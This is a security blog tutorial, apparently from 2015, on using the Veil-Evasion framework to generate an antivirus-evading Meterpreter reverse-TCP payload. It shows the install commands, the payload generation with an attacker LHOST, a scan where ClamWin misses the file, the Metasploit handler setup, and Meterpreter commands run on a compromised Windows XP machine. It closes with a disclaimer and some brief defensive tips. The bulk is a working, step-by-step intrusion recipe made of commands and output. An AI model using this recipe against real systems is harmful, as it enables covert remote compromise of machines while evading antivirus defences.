Discover Top Posts Tagged with #veil-framework

Using Veil to bypass antivirus and disguise a Metasploit backdoor

(adsbygoogle = window.adsbygoogle || []).push({});

After my second post “Using Metasploit to Hack an Android Phone” which you can read here. I received an outpouring of positive feedback particularly on Twitter from a number of readers, one of the readers @pvtcussol asked if I had ever used the tool Veil, at that stage I hadn’t, but I promised as soon as I did use Veil I would document it all in a post, so @pvtcussol this one’s for you!

@pvtcussol Thanks for the tip! I haven't played with Veil yet but when I do ill make sure I document it in a post.

— The Security Sleuth (@Security_Sleuth) January 17, 2015

So what is Veil?

Veil is billed as a tool that is capable of bypassing antivirus solutions commonly deployed on end points during pen testing engagements. Veil does this by generating random and unique payloads for exploits, we can compare these payloads to polymorphic malware which changes as it moves from host to host giving them and advantage over traditional malware which has a distinct signature which can be picked up by most antivirus solutions. Veil’s exploits are compatible with popular penetration testing tool frameworks like Metasploit making them very easy to incorporate into your penetration testing toolkit.

A number of people have asked me why would you need such a powerful tool on a penetration test? There’s a number of reasons why you need tools such as these in penetration tests but I think the most significant reason is that skilled attackers for the most part will be using entirely custom exploits and tools, there’s a high probability that these attackers have made sure that the tools they are using are either undetectable by antivirus solutions or have some sort of mechanism that can disable antivirus. Effectively Veil makes sure that when you use it you are much stealthier and your customers are getting more for their money because your tools are capable of bypassing their first line of defence which wouldn’t stop a serious, dedicated and persistent attacker anyway.

With all of this in mind I decided to see how effective Veil was.

What I used

For This post I used the following devices and tools:

A PC running Windows XP SP2 with ClamWin installed (I have used ClamWin primarily because it’s easy to install, but you could use any other antivirus solution in place of ClamWin).

An 8GB SanDisk Bootable Flash drive with Kali Linux installed on it.

A PC with a Wireless card connected to my wireless network (to run Kali on).

As for setup:

Ensure that the Windows PC is connected to a local area network and make sure you know its IP address before starting.

Plug your bootable flash drive into a PC which is powered off and power it on (you may need to make sure that your PC checks for bootable media before booting off the hard disk).

Once the PC has booted into Kali Linux make sure it’s connected to the same local area network as the Windows PC.

This example carries out all of the following activities on a single network. This example can be modified to work across multiple networks and on a range of devices.

As I do with any posts that involve powerful tools, disclaimer: I owned all of the devices used in this example. If you were to replicate this example with devices you do not own or do not have permission to use from the owner to use it may be a criminal offence.

Setting up Veil

After doing some research I found that setting up Veil is quite easy (most *nix users could do it) you basically need to run these four commands (from your home directory) As you will see below I performed the Veil installation from Kali Linux.

root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master …. Output omitted …. 2015-02-08 18:47:11 (85.9 KB/s) - `master' saved [5490594/5490594] root@kali:~# unzip master …. Output omitted …. root@kali:~# cd Veil-Evasion-master/setup

Now you will run through a lengthy but simple setup process. A portion of the setup process involves some GUI steps, just click “Next”, “Agree” and “Finished” where appropriate.

root@kali:~/Veil-Evasion-master/setup# ./setup.sh …. Output omitted …. [*] Ensuring this account owns veil output directory...

So now Veil is installed you can try it out!

Generating a payload with Veil

Immediately after installing Veil I decided to generate a payload, you do this by running a python script called “Veil-Evasion.py” so here it goes:

root@kali:~/Veil-Evasion-master/setup# cd .. root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py

When starting up Veil, you see a simple straightforward menu, I decided to list all of the payloads first thing to see what was available, at the time of writing there was 39 payloads available but this will keep growing over time:

After looking at the payloads the number I decided on using was 26 “the Meterpreter reverse TCP payload” mainly because I had used that payload before with Metasploit, but before I chose it I used the info command which gives you a neat little write up on the payload:

[>] Please enter a command: info 26 ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Payload information: Name: python/meterpreter/rev_tcp Language: python Rating: Excellent Description: pure windows/meterpreter/reverse_tcp stager, no shellcode Required Options: Name Current Value Description ---- ------------- ----------- LHOST IP of the metasploit handler LPORT 4444 Port of the metasploit handler compile_to_exe Y Compile to an executable expire_payload X Optional: Payloads expire after "X" days use_pyherion N Use the pyherion encrypter

To pick a payload to generate use the “use” command along with the number of the payload you would like to generate, after this you will set the LHOST (which should be the IP of the machine you are running Kali on) and then the generate command.

[>] Please enter a command: use 26 ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= Payload: python/meterpreter/rev_tcp loaded Required Options: Name Current Value Description ---- ------------- ----------- LHOST IP of the metasploit handler LPORT 4444 Port of the metasploit handler compile_to_exe Y Compile to an executable expire_payload X Optional: Payloads expire after "X" days use_pyherion N Use the pyherion encrypter Available commands: set set a specific option value info show information about the payload generate generate payload back go to the main menu exit exit Veil [>] Please enter a command: set LHOST 192.168.0.14 [>] Please enter a command: generate

After hitting generate you will be prompted to set what type of output the generator produces and a name for the output:

========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Press [enter] for 'payload' [>] Please enter the base name for output files: testPayload [?] How would you like to create your payload executable? 1 - Pyinstaller (default) 2 - Pwnstaller (obfuscated Pyinstaller loader) 3 - Py2Exe [>] Please enter the number of your choice: 1 err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution. 130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec 176 INFO: Testing for ability to set icons, version resources... 189 INFO: ... resource update available 191 INFO: UPX is not available. 1707 INFO: checking Analysis 1707 INFO: building Analysis because out00-Analysis.toc non existent 1707 INFO: running Analysis out00-Analysis.toc 1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable 1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest 1720 INFO: Searching for file msvcr90.dll 1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll 1720 INFO: Searching for file msvcp90.dll 1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll 1720 INFO: Searching for file msvcm90.dll 1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll 1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py 3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py 3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py 3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py 3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py 4082 INFO: Hidden import 'encodings' has been found otherwise 4084 INFO: Looking for run-time hooks 4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py 4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt 4911 INFO: checking PYZ 4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing 4911 INFO: building PYZ out00-PYZ.toc 5546 INFO: checking PKG 5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing 5546 INFO: building PKG out00-PKG.pkg 6628 INFO: checking EXE 6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing 6628 INFO: building EXE from out00-EXE.toc 6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe ========================================================================= Veil-Evasion | [Version]: 2.16.0 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe Language: python Payload: python/meterpreter/rev_tcp Required Options: LHOST=192.168.0.14 LPORT=4444 compile_to_exe=Y expire_payload=X use_pyherion=N Payload File: /usr/share/veil-output/source/testPayload.py Handler File: /usr/share/veil-output/handlers/testPayload_handler.rc [*] Your payload files have been generated, don't get caught! [!] And don't submit samples to any online scanner! ;)

So with the payload generated let’s move on to see if it gets picked up by a scanner.

How does Veil hold up under scanning?

Going back to my post “Using Metasploit to Hack an Android Phone”. To get a Meterpreter session on an Android phone I had to craft a Metasploit payload and disguise it as an .apk file so I could install it and open up a Meterpreter session for Metasploit, as a force of habit I generally tend to keep the files and outputs I create when trying out new tools or working on potential blog posts, all of the materials from that post were kept on a flash drive that on every single occasion I plug it into my windows machine, I get the pop up below:

So this exercise really does show that Antivirus, despite what people say does provide some real value for users. But watch what happens when we scan a Veil payload:

After seeing the above results I still didn’t believe that it wasn’t returning even the slightest hint of a warning, so I also tried copying over the python files used to generate the malicious payload and scanning them, as you can see below, they also didn’t return any warnings:

Most Veil tutorials end here, where the author uploads the Veil payload to Virus Total or a similar service despite being told not too by the authors of Veil. In this example I’m not going to upload the file to any online services I am however going to go a step further and see how a veil payload interacts with Metasploit.

So how do you use Veil with Metasploit?

I wanted to see how Veil works, it also supplies a python handler to configure all of the Metasploit parameters but for this case I decided to do it manually. I typed in the necessary commands and accessed the victim machine via the Meterpreter session created by the payload (a quick note here, before you get any access to the target machine you have to make sure that the victim has run the Veil payload).

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.14 LHOST => 192.168.0.14 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.14:4444 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (769536 bytes) to 192.168.0.30 [*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.30:1045) at 2015-02-14 10:30:28 +0000 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...

So after this session was ready I ran a few Meterpreter commands to verify Veil had successfully worked and had gave me a session on a remote PC:

meterpreter > pwd C:\Documents and Settings\victim\Desktop meterpreter > get uid [-] Unknown command: get. meterpreter > getuid Server username: XPTEST-0000000\victim meterpreter > idletime User has been idle for: 9 mins 7 secs meterpreter > ls Listing: C:\Documents and Settings\victim\Desktop ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2015-02-13 23:08:15 +0000 . 40777/rwxrwxrwx 0 dir 2014-07-13 04:44:45 +0000 .. 100666/rw-rw-rw- 28521 fil 2006-02-28 12:00:00 +0000 Blue hills.jpg 100777/rwxrwxrwx 3512798 fil 2015-02-08 20:38:14 +0000 testPayload.exe 100666/rw-rw-rw- 1400 fil 2015-02-08 20:37:04 +0000 testPayload.py 100666/rw-rw-rw- 143 fil 2015-02-08 20:37:04 +0000 testPayload_handler.rc meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86 0 352 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 560 668 alg.exe x86 0 C:\WINDOWS\System32\alg.exe 600 352 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 624 352 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 668 624 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 680 624 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 832 668 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 912 668 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1004 1028 wscntfy.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\system32\wscntfy.exe 1012 1676 cmd.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\system32\cmd.exe 1028 668 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1068 1028 wuauclt.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\system32\wuauclt.exe 1108 668 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1184 668 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1192 1676 testPayload.exe x86 0 XPTEST-0000000\victim C:\Documents and Settings\victim\Desktop\testPayload.exe 1200 1192 testPayload.exe x86 0 XPTEST-0000000\victim C:\Documents and Settings\victim\Desktop\testPayload.exe 1388 668 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1496 668 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1676 1624 explorer.exe x86 0 XPTEST-0000000\victim C:\WINDOWS\Explorer.EXE 1940 1676 ClamTray.exe x86 0 XPTEST-0000000\victim C:\Program Files\ClamWin\bin\ClamTray.exe

As you can see it worked!

How you can protect against this

Normally in this section I usually provide a brief rundown of protective and preventative measures to help stop the above from happening, I will do that but in addition to this I just want to say that I hope most small and medium businesses/organisations are seriously looking at more protection methods than just endpoint protection and firewalls because most of the tools out there are capable of bypassing those.

Now back to the prevention/protection methods:

Lock down PC’s as much as possible, if the above machine was locked down it would be much harder to collect information if say you were able to gain access to let’s say a sysadmins machine, but then again that depends on the information attackers may be looking for.

Exercise healthy suspicion – don’t run any executables unless you know where they came from. Personally.

Vet suspicious files through a virtual machine or test environment where they won’t be able to cause any harm.

Avoid visiting risky or illegal sites, its likely miscreants with malicious intent are using them to spread their malware.

Use some extra software in addition to antivirus e.g. anti-spyware protection.

Make sure your system is always up to date this goes a long way towards helping your machine stay secure.

Keep regular backups so you can roll back to them if all of the above fails.

Resources

http://www.behindthefirewalls.com/2013/09/how-to-bypass-antivirus-using-veil-on.html

https://www.christophertruncer.com/

https://sathisharthars.wordpress.com/2014/06/07/evading-antivirus-using-veil-framework-in-kali-linux/

https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/

Please let me know if found this article useful or if you didn't, leave a comment below to let me know another area you would be interested in reading posts about.